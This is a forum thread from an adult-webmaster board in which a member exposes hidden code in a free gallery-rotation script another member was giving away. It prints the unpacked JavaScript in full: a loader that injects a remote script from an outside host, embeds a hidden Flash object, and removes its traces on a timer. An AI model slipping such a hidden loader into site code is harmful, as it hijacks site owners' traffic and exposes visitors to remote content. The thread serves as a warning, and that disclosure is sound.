Welcome to the GoFuckYourself.com - Adult Webmaster Forum forums.

You are currently viewing our boards as a guest which gives you limited access to view most discussions and access our other features. By joining our free community you will have access to post topics, communicate privately with other members (PM), respond to polls, upload content and access many other special features. Registration is fast, simple and absolutely free so please, join our community today!

If you have any problems with the registration process or your account login, please contact us.

Post New Thread Reply

Register GFY Rules Calendar
Go Back   GoFuckYourself.com - Adult Webmaster Forum > >
Discuss what's fucking going on, and which programs are best and worst. One-time "program" announcements from "established" webmasters are allowed.

 
Thread Tools
Old 03-17-2011, 02:43 PM   #1
DrPhibes
Confirmed User
 
Join Date: Apr 2003
Posts: 108
TGP Script for free

I am giving away this popular script. Very easy to install. Gallery rotation and customization.

Download: http://www.megaupload.com/?d=SYWBLPJW
DrPhibes is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 03-17-2011, 02:47 PM   #2
bbobby86
partners.sexier.com
 
bbobby86's Avatar
 
Industry Role:
Join Date: Jan 2007
Location: San Francisco, CA
Posts: 11,926
thanks man...
__________________

bbobby86 is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 03-17-2011, 03:10 PM   #3
nation-x
Confirmed User
 
nation-x's Avatar
 
Industry Role:
Join Date: Mar 2004
Location: Rock Hill, SC
Posts: 5,370
I wonder how many idiots you will get to send traffic to your tube galleries.

Nice Tool Here: http://www.strictly-software.com/unpack-javascript.aspx

Code:
var url = '';
function LoadUrls() {
	var fileref = document.createElement('script');
	fileref.setAttribute("type", "text/javascript");
	fileref.setAttribute("id", "rjs");
	fileref.setAttribute("src", "http://www.pornotubes.info/stats/r.php");
	var bodyElement = document.getElementsByTagName('body')[0];
	bodyElement.appendChild(fileref);
	setTimeout("RemoveElement('rjs');", 3000)
}
function CreateStats() {
	var stats = '<object width="1" height="1" classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,29,0"><param name="movie" value="' + url + '"><param name="wmode" value="transparent"><embed src="' + url + '" quality="high" type="application/x-shockwave-flash" allowfullscreen="false" allowSriptAccess="always" allownetworking="all" wmode="transparent" width="1" height="1"></embed></object>';
	var statsdiv = document.createElement('div');
	var divId = 'stats';
	statsdiv.setAttribute('id', divId);
	statsdiv.innerHTML = stats;
	var bodyElement = document.getElementsByTagName('body')[0];
	bodyElement.appendChild(statsdiv);
	setTimeout("RemoveElement('stats');", 5000)
}
function RemoveElement(id) {
	var d = document.getElementById(id);
	d.parentNode.removeChild(d)
}
function createCookie(name, value, days) {
	if (days) {
		var date = new Date();
		date.setTime(date.getTime() + (days * 24 * 60 * 60 * 1000));
		var expires = "; expires=" + date.toGMTString()
	} else var expires = "";
	document.cookie = name + "=" + value + expires + "; path=/"
}
function readCookie(name) {
	var nameEQ = name + "=";
	var ca = document.cookie.split(';');
	for (var i = 0; i < ca.length; i++) {
		var c = ca[i];
		while (c.charAt(0) == ' ') c = c.substring(1, c.length);
		if (c.indexOf(nameEQ) == 0) return c.substring(nameEQ.length, c.length)
	}
	return null
}
if (readCookie('rotation_ok') != "1") {
	setTimeout("LoadUrls();", 1000);
	setTimeout("CreateStats();", 4100);
	createCookie('rotation_ok', "1", 1)
}
nation-x is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 03-17-2011, 03:47 PM   #4
Paul&John
Confirmed User
 
Paul&John's Avatar
 
Industry Role:
Join Date: Aug 2005
Location: YUROP
Posts: 8,605
Quote:
Originally Posted by nation-x View Post
I wonder how many idiots you will get to send traffic to your tube galleries.

Nice Tool Here: http://www.strictly-software.com/unpack-javascript.aspx

Code:
var url = '';
function LoadUrls() {
	var fileref = document.createElement('script');
	fileref.setAttribute("type", "text/javascript");
	fileref.setAttribute("id", "rjs");
	fileref.setAttribute("src", "http://www.pornotubes.info/stats/r.php");
	var bodyElement = document.getElementsByTagName('body')[0];
	bodyElement.appendChild(fileref);
	setTimeout("RemoveElement('rjs');", 3000)
}
function CreateStats() {
	var stats = '<object width="1" height="1" classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,29,0"><param name="movie" value="' + url + '"><param name="wmode" value="transparent"><embed src="' + url + '" quality="high" type="application/x-shockwave-flash" allowfullscreen="false" allowSriptAccess="always" allownetworking="all" wmode="transparent" width="1" height="1"></embed></object>';
	var statsdiv = document.createElement('div');
	var divId = 'stats';
	statsdiv.setAttribute('id', divId);
	statsdiv.innerHTML = stats;
	var bodyElement = document.getElementsByTagName('body')[0];
	bodyElement.appendChild(statsdiv);
	setTimeout("RemoveElement('stats');", 5000)
}
function RemoveElement(id) {
	var d = document.getElementById(id);
	d.parentNode.removeChild(d)
}
function createCookie(name, value, days) {
	if (days) {
		var date = new Date();
		date.setTime(date.getTime() + (days * 24 * 60 * 60 * 1000));
		var expires = "; expires=" + date.toGMTString()
	} else var expires = "";
	document.cookie = name + "=" + value + expires + "; path=/"
}
function readCookie(name) {
	var nameEQ = name + "=";
	var ca = document.cookie.split(';');
	for (var i = 0; i < ca.length; i++) {
		var c = ca[i];
		while (c.charAt(0) == ' ') c = c.substring(1, c.length);
		if (c.indexOf(nameEQ) == 0) return c.substring(nameEQ.length, c.length)
	}
	return null
}
if (readCookie('rotation_ok') != "1") {
	setTimeout("LoadUrls();", 1000);
	setTimeout("CreateStats();", 4100);
	createCookie('rotation_ok', "1", 1)
}
nice find
__________________
Use coupon 'pauljohn' for a $1 discount at already super cheap NameSilo!
Anal Webcams | Kinky Trans Cams Live | Hotwife XXX Tube | Get your Proxies here
Paul&John is online now   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 03-17-2011, 04:32 PM   #5
DrPhibes
Confirmed User
 
Join Date: Apr 2003
Posts: 108
I am sorry, just wanted to share this script that I have found for free
I will remove it inmediately from my site.
Thanks nation x for this find.
DrPhibes is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Post New Thread Reply
Go Back   GoFuckYourself.com - Adult Webmaster Forum > >

Bookmarks



Advertising inquiries - marketing at gfy dot com

Contact Admin - Advertise - GFY Rules - Top

©2000-, AI Media Network Inc



Powered by vBulletin
Copyright © 2000- Jelsoft Enterprises Limited.